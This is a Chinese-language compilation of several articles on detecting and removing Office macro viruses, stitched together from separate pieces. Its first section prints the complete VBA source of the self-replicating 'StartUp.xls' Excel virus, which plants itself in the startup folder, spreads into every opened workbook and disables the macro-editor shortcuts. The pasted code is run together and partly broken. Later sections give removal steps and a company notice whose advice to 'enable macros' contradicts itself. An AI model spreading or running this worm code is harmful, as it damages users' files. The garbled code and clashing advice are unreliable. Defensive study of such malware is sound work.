一个简单宏病毒的感染与清楚

清除宏病毒，名字是：StartUp.xls方法--大白菜文中图片都很小，看不清楚，可以用以下快捷方式：按住ctrl 向上滚动鼠标滑轮可以放大word，就可以看清楚图片了病毒样本如下：（下面是宏病毒代码，电脑知识欠缺的，千万被乱动哦，小心弄巧成拙）Vba代码=================宏病毒代码复制从下一行开始=================Sub auto_open()On Error Resume NextIf ThisWorkbook.Path <> Application.StartupPath AndDir(Application.StartupPath & "\" & "StartUp.xls") = "" ThenApplication.ScreenUpdating = FalseThisWorkbook.Sheets("StartUp").CopyActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")n$ = ActiveWindow.Visible = FalseWorkbooks("StartUp.xls").SaveWorkbooks(n$).Close (False)End IfApplication.OnSheetActivate = "StartUp.xls!cop"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnKey "%{F8}", "StartUp.xls!escape"End SubSub cop()On Error Resume NextIf ActiveWorkbook.Sheets(1).Name <> "StartUp" ThenApplication.ScreenUpdating = Falsen$ = Workbooks("StartUp.xls").Sheets("StartUp").Copybefore:=Worksheets(1)Sheets(n$).SelectEnd IfEnd SubSub back()On Error Resume NextApplication.OnKey "%{F8}", "StartUp.xls!escape"Application.OnKey "%{F11}", "StartUp.xls!escape"Application.OnSheetActivate = "StartUp.xls!cop"Application.OnTime Now + TimeValue("00:00:01"), "StartUp.xls!cop" Workbooks.Open Application.StartupPath & "\StartUp.xls"End SubSub escape()On Error Resume NextApplication.OnSheetActivate = "StartUp.xls!back"Application.OnKey "%{F11}"Application.OnKey "%{F8}"Application.SendKeys "%{F11}"Application.SendKeys "%{F8}"For Each book In WorkbooksApplication.DisplayAlerts = FalseIf book "StartUp.xls" Then book.Sheets("StartUp").DeleteNextFor Each book In WorkbooksIf = "StartUp.xls" Thenbook.CloseEnd IfNextEnd Sub=================宏病毒代码复制到上一行结束=================为了知道如何操作，亲自运行病毒源码之后，（按住ctrl 向上滚动鼠标滑轮可以放大word ，就可以看清楚图片了）采取以下的方法处理，可以清除病毒并使感染文件在修改保存后也清除病毒（网上有人说用360或卡巴直接杀会导致文件打不开）：说明：如果找不到那个路径，是因为C盘是系统盘，那些是系统文件，被隐藏了，可以参照：/xiaolincc26/blog/item/2c524d4be7757c2d08f7ef35.h tml去做步骤：一、删除Excel11.xls文件位置路径：C:\Documents and Settings\Administrator\ApplicationData\Microsoft\Excel\Excel11.xls，该文件删除后，Excel会自动重建的；二、删除StartUp.xls文件位置路径：C:\Documents and Settings\Administrator\ApplicationData\Microsoft\Excel\XLSTART\StartUp.xls二、新建一个空的StartUp.xls，工具-》宏-》录制宏（随便录，只是为了能打开VBA编辑器）；下面这个就叫VBA编辑器（普通人没有要知道，百度一下就有/view/88461.htm）：这张图不是步骤中的内容，只是了解下.第二步：1.新建一个Excel：2.重命名为StartUp.xls三、从“工具－>宏－>宏”里面，选择刚才录制的宏，选择“编辑”，把全部内容都选中，把用下列内容替换：第三步：1.打开刚刚新建的那个Excel： StartUp.xls2.打开录制宏，工具-》宏—>录制宏，点击上图的确定，3.打开宏，工具—》宏--》宏，4.点击编辑按钮，5.复制Vba代码（看清楚开始和结束位置）内容到编辑区，覆盖原有的内容，Vba代码============复制从下一行开始（Sub auto open()开始）=============Sub auto_open()On Error Resume NextApplication.ScreenUpdating = FalseActiveWindow.Visible = Falsen$ = Workbooks(n$).Close (False)Application.OnSheetActivate = "StartUp.xls!cop"End SubSub cop()On Error Resume NextDim VBC As ObjectDim Name As String'Dim delComponent As VBComponentName = "StartUp"For Each book In WorkbooksSet delComponent = book.VBAProject.VBComponents(Name)book.VBAProject.VBComponents.Remove delComponentNextEnd Sub============复制到上一行结束（End Sub结束）=============6.关闭时候，保存StartUp.xls四、保存，然后再打开染毒文档，修改保存一下就可以清除掉感染的病毒。

怎么清除Word宏病毒在这个病毒泛滥的时代里面，你是否听说过宏病毒?那你知道怎么清除Word宏病毒吗?下面是店铺整理的一些关于怎么清除Word宏病毒的相关资料，供你参考。

清除Word宏病毒的方法:一、Word宏病毒MicrosoftWord中对宏定义为：“宏就是能组织到一起作为一独立的命令使用的一系列Word命令，它能使日常工作变得更容易。

”Word使用宏语言WordBasic将宏作为一系列指令来编写。

要想搞清楚宏病毒的来龙去脉，必须了解Word宏的知识及WordBasic编程技术。

Word宏病毒是一些制作病毒的专业人员利用MICROSOFTWord 的开放性即Word中提供的WordBASIC编程接口，专门制作的一个或多个具有病毒特点的宏的集合，这种病毒宏的集合影响到计算机使用，并能通过DOC文档及DOT模板进行自我复制及传播。

宏病毒的特点1、传播极快Word宏病毒通过DOC文档及DOT模板进行自我复制及传播，而计算机文档是交流最广的文件类型。

多年来，人们大多重视保护自己计算机的引导部分和可执行文件不被病毒感染，而对外来的文档文件基本是直接浏览使用，这给Word宏病毒传播带来很多便利。

特别是Internet网络的普及，E-mail的大量应用更为Word宏病毒传播铺平道路。

2、制作、变种方便Word使用宏语言WordBasic来编写宏指令。

宏病毒同样用WordBasic来编写。

目前，世界上的宏病毒原型已有几十种，其变种与日骤增，追究其原因还是Word的开放性所致。

现在的Word病毒都是用WordBasic语言所写成，大部分Word病毒宏并没有使用Word提供的Execute—Only处理函数处理，它们仍处于可打开阅读修改状态。

所有用户在Word工具的宏菜单中很方便就可以看到这种宏病毒的全部面目。

当然会有“不法之徒”利用掌握的Basic语句把其中病毒激活条件和破坏条件加以改变，立即就生产出了一种新的宏病毒，甚至比原病毒的危害更加严重。

宏病毒处理方法----6f0bef1d-715c-11ec-9def-7cb59b590d7d 各位领导及同事：最近，在各个部门的办公软件中都发现了宏病毒。

宏病毒会自动改变EXECL文件的安全性（自动将其设置为低），并在攻击后销毁受感染的office文件，严重影响每个人的日常工作。

处理方式简要介绍如下（该处理方式主要针对office 2022）：一：随本文件一起打包有“金山毒霸宏病毒专杀工具”，双击“金山毒霸宏病毒专杀工具”自动进行安装，安装后界面如下:点击全面杀毒，全面检查并杀灭电脑中的office病毒。

（如果电脑上安装了WPS，并且专门杀掉了金山毒霸宏病毒，则无法对其进行检查和杀掉）二：1、随本文件一起打包有最新360安装文件，双击“新版360杀毒软件”进行安装（注意：在安装360安装包前需将电脑以前安装过的杀毒软件卸载，卸载后重启电脑再安装最新版360），新版360在病毒免疫中启动新增office宏病毒免疫功能。

2.在杀毒软件右上角，打开设置，按下图设置杀毒软件参数：3、在设置中打开“病毒扫描设置”，其中“需要扫描文件类型”选中“扫描所有文件、进入压缩包查毒”。

4.设置完成后，更新杀毒软件，如下图所示。

点击软件右上角的“升级”按钮，在打开的界面中自动升级。

反复确认升级完成后，选择“完全扫描”，然后检查病毒。

三：查杀完宏病毒后打开excel表格文件设置，将宏的安全性设置为高“工具——宏——安全性”如果宏的安全性不能设置为高，则需要对该文件点击右键，单独进行一次360杀毒和“金山毒霸宏病毒专用杀毒工具”杀毒，然后将“宏”安全调整为“中”，如下图所示。

打开文件后，如果出现“禁用宏”或“启用宏”选项，请选择“启用宏”。

（您只需检查并终止文档一次）希望各部门严格按照上述方法对公司办公电脑及个人电脑进行office宏病毒查杀。

海螺其他兄弟公司也有宏病毒出现，请大家在接受邮件及使用移动存储设备之前先使用上述两个软件进行查杀后再打开，以免出现重复感染。

清除excel宏病毒如何清除excel电⼦表格宏病毒
Excel中的宏病毒相信很多朋友都有遇到过吧，那么如何清除呢？下⾯是⼩编最近学到的⼀个有效清除Excel电⼦表格宏病毒的⽅法，特意在此跟⼤家进⾏分享！
⼿动清除Excel宏病毒的具体⽅法：
1、进⼊ C：Program FilesMicrosoft OfficeOFFICE11xlstart下先删除book1⽂件，(注意：这个C是指你的系统盘，⽐如我的是双系统，那么打开C盘就是删了也是⽆⽤的，看你使⽤的是哪个系统。

)然后再建⽴Book1⽂件夹;
2、打开EXCEL⽂档，格式——>⼯作表——>取消隐藏⼯作表，删除xl4poppy⼯作表，然后，点击菜单：插⼊——>名称——>定义，删除所有的名称。

保存;
3、处理完再删除刚才建⽴的⽂件夹。

这样就可以清松消灭掉Excel宏病毒，再打开你的excel⽂件，就安全了。

word宏病毒查杀技巧
word宏病毒查杀技巧
宏病毒是通过Word中的宏语言（一种类似VB的语言）编写的，易于传播而且危害巨大，常常能将用户花了很多时间编写的文档瞬间“吃掉”，下面介绍使用手工的方法杀掉和预防宏病毒。

单击“工具”菜单栏，选择“宏”，单击“宏”命令，或者使用组合键Alt＋F8调出宏对话框，如果在弹出的对话框中有已经记录的宏的话，那就极有可能是宏病毒，删除所有的宏就可以了；比较复杂的宏病毒会将宏对话框屏蔽掉，这时就需要采用其他方法。

Word环境中的宏病毒一般是存放在Microsoft Office目录下Templates子目录中的Normal.dot文件中，这时需要重新启动计算机，找到这个文件，并把它删除，再运行Word就可以了。

有些宏病毒“知道”用户会找到Normal.dot并删除掉，所以它会在硬盘的多个目录中放上同样的Normal.dot，如果只删除Templates下的一个，Word会按照Windows缺省的搜索路径进行搜索，这样会加载其他有毒的Normal.dot，并把删除掉的再重新恢复。

这时，用户只要使用Windows中的查找文件的方法把硬盘中所有的Normal.dot全部删除就可以了。

将宏病毒从根拔起预防宏病毒的方法其实很简单，因为宏病毒在Word中寄居的文件就是Normal.dot，所以只要把没有感染宏病毒的Normal.dot文件的属性设置为只读，这样宏病毒就不能寄居到Normal.dot中，这样能起到预防宏病毒的效果了。

1。

一、宏病毒是什么？宏病毒是一种寄存在文档或模板的宏中的计算机病毒。

一旦打开这样的文档，其中的宏就会被执行，于是宏病毒就会被激活，转移到计算机上，并驻留在Normal模板上。

从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。

二、宏病毒的判断方法虽然不是所有包含宏的文档都包含了宏病毒，但当有下列情况之一时，您可以百分之百地断定您的OFFICE文档或OFFICE系统中有宏病毒：1、在打开“宏病毒防护功能”的情况下，当您打开一个您自己写的文档时，系统会会弹出相应的警告框。

而您清楚您并没有在其中使用宏或并不知道宏到底怎么用，那么您可以完全肯定您的文档已经感染了宏病毒。

2、同样是在打开“宏病毒防护功能”的情况下，您的OFFICE文档中一系列的文件都在打开时给出宏警告。

由于在一般情况下我们很少使用到宏，所以当您看到成串的文档有宏警告时，可以肯定这些文档中有宏病毒。

3、如果软件中关于宏病毒防护选项启用后，不能在下次开机时依然保存。

WORD中提供了对宏病毒的防护功能，它可以在“工具/选项/常规”中进行设定。

但有些宏病毒为了对付OFFICE中提供的宏警告功能，它在感染系统（这通常只有在您关闭了宏病毒防护选项或者出现宏警告后您不留神选取了“启用宏”才有可能）后，会在您每次退出OFFICE时自动屏蔽掉宏病毒防护选项。

因此您一旦发现:您的机器中设置的宏病毒防护功能选项无法在两次启动WORD之间保持有效，则您的系统一定已经感染了宏病毒。

也就是说一系列WORD模板、特别是normal.dot 已经被感染。

鉴于绝大多数人都不需要或着不会使用“宏”这个功能，我们可以得出一个相当重要的结论：如果您的OFFICE文档在打开时，系统给出一个宏病毒警告框，那么您应该对这个文档保持高度警惕，它已被感染的几率极大。

注意：简单地删除被宏病毒感染的文档并不能清除OFFICE系统中的宏病毒！三、宏病毒的防治和清除首选方法：用最新版的反病毒软件清除宏病毒。

excel怎么清除宏病毒
Excel中臭名昭著的宏病毒相信很多朋友都有遇到过吧，这可是很烦人的一个病毒，那么如何清除它呢?下面小编来告诉你吧。

excel清除宏病毒的方法：
1、进入 C:\Program Files\Microsoft Office\OFFICE11\xlstart\下先删除book1文件，然后再建立Book1文件;
2、打开染了病毒的EXCEL文档，格式-->工作表-->取消隐藏工作表，删除xl4poppy工作表，然后，点击菜单：插入-->名称-->定义，删除所有的名称，保存文档;
3、处理完再删除刚才建立的Book1文件。

4、以上步骤就能清除所感染的某个文件的病毒，当然其他受感染某个文件也是一样的清除方法。

这样手动清除是会慢些，比如有些电脑里差不多所有Excel文件都染宏病毒，如果这样一个一个处理是不理智的。

对于这么多的病毒文件就应先用宏专杀软件来清除大部分病毒，剩下少数的变种宏病毒用以上这种方法就能根除了。

预防和清除宏病毒的方法摘要：宏是WORD中避免一再的重复相同的动作而设计出来的一种工具，宏病毒就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。

本文首先分析宏病毒的特性，并就如何检测、清除及预防进行了探讨。

关键词：宏病毒；WORD；预防；清除Abstract: The macro is a tool designed to avoid repeated the same action in the WORD, and a macro virus is the copy and infectious macro using the software to support macros written. This paper first analyzes the characteristics of macro virus, and discusses on how to detect, removal and prevent it.Key words: macro virus; WORD; prevention; clear所谓宏病毒，就是利用软件所支持的宏命令编写的具有复制和传染能力的宏。

宏病毒是一种新形态的计算机病毒，也是一种跨平台式计算机病毒。

1.宏病毒的工作原理在用W O R D 处理文档时，需要同时进行各种不同的动作，每一种动作其实都对应着特定的宏命令。

宏病毒的感染过程和破坏行为与WORD 的文件宏程序的操作密切相关，这些宏程序可能就是宏病毒的插入点。

病毒包含在宏中时，只要染毒的文件被打开，病毒的宏程序就可能会被执行，进而取得系统控制权，进行感染和破坏。

为了能广泛地传播，宏病毒大都采用感染通用模版NORMAL.DOT 的方法将自己复制到其他文档中去。

W O R D启动时总是自动打开通用模版，这就为宏病毒在每次启动WORD 时能够取得系统控制权提供了机会。

含有自动宏的染毒文档，当被其他计算机的WORD 打开时，也会自动感染该计算机。